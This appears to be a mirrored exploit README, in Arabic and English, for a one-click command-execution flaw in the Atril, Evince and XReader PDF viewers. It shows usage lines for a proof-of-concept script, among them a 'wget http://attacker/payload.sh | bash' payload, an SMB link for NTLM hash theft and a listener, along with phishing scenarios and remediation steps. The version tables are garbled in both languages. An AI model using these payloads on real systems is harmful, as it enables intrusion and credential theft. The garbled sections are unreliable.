## https://sploitus.com/exploit?id=4AF7CD1F-7B94-50D7-B596-A323479F13D9
# ─── CVE-2026-46529 ───
# 🏴 AMN SECURITY 🏴
### مركز أبحاث الأمن السيبراني | Cyber Security Research Center
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# ⚠️ ثغرة تنفيذ أوامر عن بُعد بنقرة واحدة في عارضي PDF على لينكس
### CVE-2026-46529 | CVSS 7.8 | عالية الخطورة
---
### 📋 الملخص التنفيذي
ثغرة أمنية خطيرة من نوع **تنفيذ أوامر عن بُعد بنقرة واحدة (Single-Click RCE)** في **عارض مستندات Atril** (عارض PDF الافتراضي لبيئة MATE Desktop) وأخويه **Evince** (عارض GNOME) و **XReader** (عارض Xfce). تسمح هذه الثغرة لمهاجم بتنفيذ أكواد ضارة على جهاز الضحية بمجرد خداعه للنقر على رابط داخل ملف PDF.
تعمل الثغرة عن طريق تضمين رابط خبيث في مستند PDF. عند النقر على الرابط، يقوم التطبيق بتفسير URI بطريقة غير آمنة، مما يسمح بتنفيذ أوامر عشوائية بصلاحيات المستخدم الحالي.
| العنصر | التفاصيل |
|--------|----------|
| **CVE** | CVE-2026-46529 |
| **CVSS v3.1** | 7.8 (High) |
| **المتجه** | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| **النوع** | Remote Code Execution via Clickable Link |
| **المنتج** | Atril Document Viewer (MATE) |
| **المنتجات المتأثرة** | Atril /tmp/pwned'"
# PDF مع رابط SMB لسرقة هاش NTLM
python3 CVE-2026-46529.py -o exfil.pdf -u "smb://attacker/share/file"
# تشغيل خادم استماع (Listener)
python3 CVE-2026-46529.py --listen -p 8080
# إرسال PDF عبر البريد الإلكتروني
python3 CVE-2026-46529.py -o report.pdf -c "wget http://attacker/payload.sh | bash"
```
#### الخيارات المتاحة
| الخيار | الوصف |
|--------|-------|
| `-o, --output` | اسم ملف PDF الناتج |
| `-u, --uri` | رابط URI مخصص للرابط الضار |
| `-c, --command` | أمر لينكس لتنفيذه |
| `--listen` | تشغيل خادم استماع |
| `-p, --port` | منفذ الخادم (افتراضي: 8080) |
| `--no-preview` | تعطيل معاينة PDF (للتخفيف) |
| `-v, --verbose` | إظهار تفاصيل إضافية |
---
### 🛡️ الإجراءات العلاجية
| الإجراء | الأولوية | الوصف |
|---------|----------|-------|
| **تحديث عارض PDF** | 🟢 فوري | تحديث Atril إلى 1.26.3 / 1.28.4 |
| **تثبيت التحديثات الأمنية** | 🟢 عاجل | تحديث Evince و XReader أيضاً |
| **تفعيل الحماية من الروابط** | 🟡 مهم | تعطيل فتح الروابط تلقائياً في العارض |
| **استخدام Sandbox** | 🟡 مهم | تشغيل عارض PDF في بيئة معزولة (Firejail) |
| **التوعية الأمنية** | 🔵 مستمر | تدريب المستخدمين على عدم النقر على روابط في PDF |
| **عارض PDF بديل** | 🟡 اختياري | استخدام Okular أو qpdfview كبديل |
#### تشغيل عارض PDF في بيئة معزولة
```bash
# استخدام Firejail لعزل Atril
sudo apt install firejail
firejail atril document.pdf
# أو استخدام Bubblewrap
bwrap --ro-bind / / --tmpfs /home --unshare-net atril document.pdf
```
#### تعطيل فتح الروابط في Evince
```bash
# تعطيل فتح الروابط في Evince عبر GSettings
gsettings set org.gnome.Evince allow-links-change-zoom false
gsettings set org.gnome.Evince override-restriction false
```
---
### 📊 السيناريوهات الهجومية
#### هجوم مستهدف (Targeted Attack)
```
المهاجم: يبحث عن ضحية في مؤسسة تستخدم Linux + MATE/GNOME
│
▼
المهاجم: يصمم PDF يبدو كتقرير رسمي أو فاتورة
│
▼
المهاجم: يرسل PDF عبر البريد الإلكتروني (Spear Phishing)
│
▼
الضحية: يفتح PDF ← ينقر على الرابط ← اختراق
│
▼
المهاجم: وصول أولي ← حركة جانبية ← استيلاء على الشبكة
```
#### هجوم جماعي (Mass Attack)
```
المهاجم: ينشر PDF ضار على منصات التحميل / التورنت
│
▼
المهاجم: ينتظر المستخدمين لتحميل PDF
│
▼
كل من يفتحه في Atril/Evince/XReader يصاب
```
---
### 📚 المراجع
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-46529
- **MATE GitLab**: https://gitlab.com/mate-desktop/atril/-/issues/CVE-2026-46529
- **GNOME GitLab**: https://gitlab.gnome.org/GNOME/evince/-/issues/CVE-2026-46529
- **XFCE GitLab**: https://gitlab.xfce.org/apps/xreader/-/issues/CVE-2026-46529
> ⚠️ **إخلاء مسؤولية**: هذا التقرير لأغراض تعليمية وبحثية فقط. استخدام هذه المعلومات لأغراض غير قانونية يتحمل المستخدم مسؤوليته بالكامل.
---
### 🔗 تواصل مع AMN SECURITY
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
---
# ⚠️ CVE-2026-46529 — Atril/Evince/XReader PDF Clickable Link RCE
### CVSS 7.8 | HIGH | Single-Click Remote Code Execution
---
### Executive Summary
**CVE-2026-46529** is a critical single-click Remote Code Execution vulnerability in the **Atril Document Viewer** (MATE desktop's default PDF reader), **Evince** (GNOME), and **XReader** (Xfce). The vulnerability allows attackers to execute arbitrary code by tricking users into clicking a link inside a malicious PDF document.
The vulnerability exists in the URI handling mechanism. When a user clicks a link in a PDF, Atril passes the URI to `gtk_show_uri()` without adequate sanitization, allowing attackers to craft malicious URIs using dangerous protocols like `file://`, `ghelp://`, or arbitrary command execution.
| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-46529 |
| **CVSS v3.1** | 7.8 (High) |
| **Vector** | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| **Type** | Remote Code Execution via Clickable Link |
| **Product** | Atril Document Viewer (MATE) |
| **Affected Versions** | Atril /tmp/pwned'"
# PDF with SMB link for NTLM hash capture
python3 CVE-2026-46529.py -o exfil.pdf -u "smb://attacker/share/file"
# Start a listener
python3 CVE-2026-46529.py --listen -p 8080
```
### Remediation
| Action | Priority | Description |
|--------|----------|-------------|
| **Update Viewer** | 🔴 Immediate | Update Atril to 1.26.3 / 1.28.4+ |
| **Apply Security Updates** | 🔴 Urgent | Update Evince and XReader as well |
| **Disable Auto-Link** | 🟡 Important | Disable automatic link handling in viewer |
| **Sandbox Viewer** | 🟡 Important | Run PDF viewer in Firejail/Bubblewrap |
| **Security Awareness** | 🔵 Ongoing | Train users not to click links in PDFs |
#### Running in Sandbox
```bash
# Using Firejail
sudo apt install firejail
firejail atril document.pdf
```
#### Disable Links in Evince
```bash
gsettings set org.gnome.Evince allow-links-change-zoom false
gsettings set org.gnome.Evince override-restriction false
```
### Attack Scenarios
#### Targeted Attack (Spear Phishing)
Attacker crafts PDF as official document/Invoice → sends via email → victim clicks → initial access → lateral movement → network compromise
#### Mass Attack
Attacker uploads malicious PDF to torrent sites/download platforms → waits for downloads → every user opening with Atril/Evince is compromised
### References
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-46529
- **MATE GitLab**: https://gitlab.com/mate-desktop/atril
- **GNOME GitLab**: https://gitlab.gnome.org/GNOME/evince
---
### Connect with AMN SECURITY
🌐 **Website**: https://amn.amnoffsec.workers.dev/
📸 **Instagram**: https://www.instagram.com/ixctw
📧 **Email**: ayman.mahmoudoffsec@gmail.com
---
> ⚠️ **Disclaimer**: This report is for educational and research purposes only. Unauthorized use of this information is illegal and the user bears full responsibility.